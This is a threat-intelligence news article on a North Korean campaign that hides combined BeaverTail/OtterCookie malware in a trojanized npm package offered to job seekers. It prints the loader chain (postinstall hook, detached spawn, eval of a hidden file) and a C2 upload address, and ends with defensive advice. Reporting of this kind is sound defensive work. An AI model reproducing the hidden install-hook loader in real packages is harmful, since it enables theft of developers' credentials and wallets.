In a recent cybersecurity development, North Korean state-sponsored hackers have been identified utilizing a sophisticated malware campaign that combines two previously distinct tools—BeaverTail and OtterCookie—into a single, potent JavaScript payload. This campaign specifically targets job seekers by distributing a trojanized Node.js application named Chessfi through a modified npm package hosted on the official repository.
Infection Mechanism
The attack begins with victims being lured through fraudulent employment offers. As part of a supposed coding assessment, they are instructed to install the Chessfi application. Unbeknownst to them, this action triggers malicious scripts designed to harvest sensitive information, including credentials, cryptocurrency wallets, and user activity data.
Cisco Talos analysts uncovered this campaign while investigating unusual outbound traffic from a compromised system. They discovered that a post-installation script within the `node-nvm-ssh` package initiates a concealed child process. This process deobfuscates and executes a substantial JavaScript payload that integrates functionalities from both BeaverTail and OtterCookie.
Malware Capabilities
Once executed, the combined malware establishes a connection to a command-and-control (C2) server using the socket.io library. This connection enables attackers to remotely issue commands, exfiltrate files matching specific patterns (such as `.env` and `.docx` files, as well as directories associated with cryptocurrency extensions), and execute shell commands on the infected system.
A particularly concerning feature of this malware is its keylogging capability. The keylogging component captures every keystroke made by the user and takes periodic desktop screenshots. This data is then uploaded to the C2 server along with clipboard contents, providing attackers with comprehensive insight into the victim’s activities.
Technical Details
Infected systems exhibit sustained network activity on high-numbered TCP ports, commonly port 1418 for socket.io communications and port 1478 for keylog data uploads. The malware creates a temporary folder named `windows-cache`, where it writes keystrokes to a file named `1.tmp` every second and saves screenshots as `2.jpeg` every four seconds.
Utilizing Node.js packages such as `node-global-key-listener`, `screenshot-desktop`, and `sharp`, the malware configures listeners for keyboard events and schedules screenshot captures. It then bundles and sends this data to the C2 server at `hxxp://172.86.88.188:1478/upload`.
Evasion Techniques
The infection mechanism employs a multi-stage chain to evade detection. After the victim clones the repository, a malicious `postinstall` script in the `package.json` file executes the `skip` script:
“`json
scripts: {
postinstall: npm run test npm run transpile npm run skip
}
“`
The `skip` command invokes `node testfixtures/eval`, which by default loads `index.js`. This script spawns a detached child process running `file15.js`:
“`javascript
const filePath = path.join(__dirname, ‘node_modules’, ‘file15.js’);
const child = spawn(process.execPath, [filePath], { detached: true, stdio: ‘ignore’ });
“`
Finally, `file15.js` reads and evaluates the content of `test.list` using `eval`, revealing the combined BeaverTail and OtterCookie modules:
“`javascript
const fs = require(‘fs’);
const path = require(‘path’);
const filePath = path.join(__dirname, ‘test.list’);
fs.readFile(filePath, ‘utf8’, (err, data) => { eval(data); });
“`
This intricate infection chain—comprising repository cloning, execution of seemingly benign npm scripts, spawning of hidden processes, and dynamic evaluation of obfuscated payloads—underscores the sophisticated tactics employed by the attackers.
Background on BeaverTail and OtterCookie
BeaverTail is a JavaScript-based stealer and loader that has been previously used to target software developers. It is known for its ability to steal browser login credentials, gather system data, and list cryptocurrency wallet extensions in targeted browsers. In some instances, BeaverTail has been used to download additional malware components, such as the Python-based backdoor known as InvisibleFerret.
OtterCookie, on the other hand, is a sophisticated malware attributed to the North Korean threat actor WaterPlum (also known as Famous Chollima or PurpleBravo). It has been observed targeting financial institutions, cryptocurrency operators, and FinTech companies worldwide. OtterCookie’s capabilities include remote shell access, file exfiltration, clipboard monitoring, and keylogging. Its cross-platform functionality allows it to operate on Windows, Linux, and macOS systems.
Implications and Recommendations
The fusion of BeaverTail and OtterCookie into a single payload signifies a strategic evolution in cyber-espionage tactics, particularly in targeting individuals through social engineering. By exploiting the trust inherent in job recruitment processes, attackers can effectively infiltrate systems and exfiltrate sensitive information.
To mitigate the risks associated with such sophisticated attacks, individuals and organizations are advised to:
– Exercise Caution with Unsolicited Job Offers: Be wary of unexpected job offers, especially those that require the installation of software or participation in coding assessments involving unfamiliar applications.
– Verify the Authenticity of Software Packages: Before installing any software, especially from open-source repositories, verify the authenticity and integrity of the package. Check for signs of tampering or unusual activity associated with the package.
– Implement Robust Endpoint Protection: Utilize comprehensive endpoint detection and response (EDR) solutions to monitor and respond to suspicious activities on devices.
– Educate Employees on Social Engineering Tactics: Conduct regular training sessions to raise awareness about social engineering tactics and phishing schemes. Educated employees are less likely to fall victim to such attacks.
– Regularly Update and Patch Systems: Ensure that all systems and software are up to date with the latest security patches to protect against known vulnerabilities.
By adopting these proactive measures, individuals and organizations can enhance their defenses against the evolving landscape of cyber threats posed by state-sponsored actors.
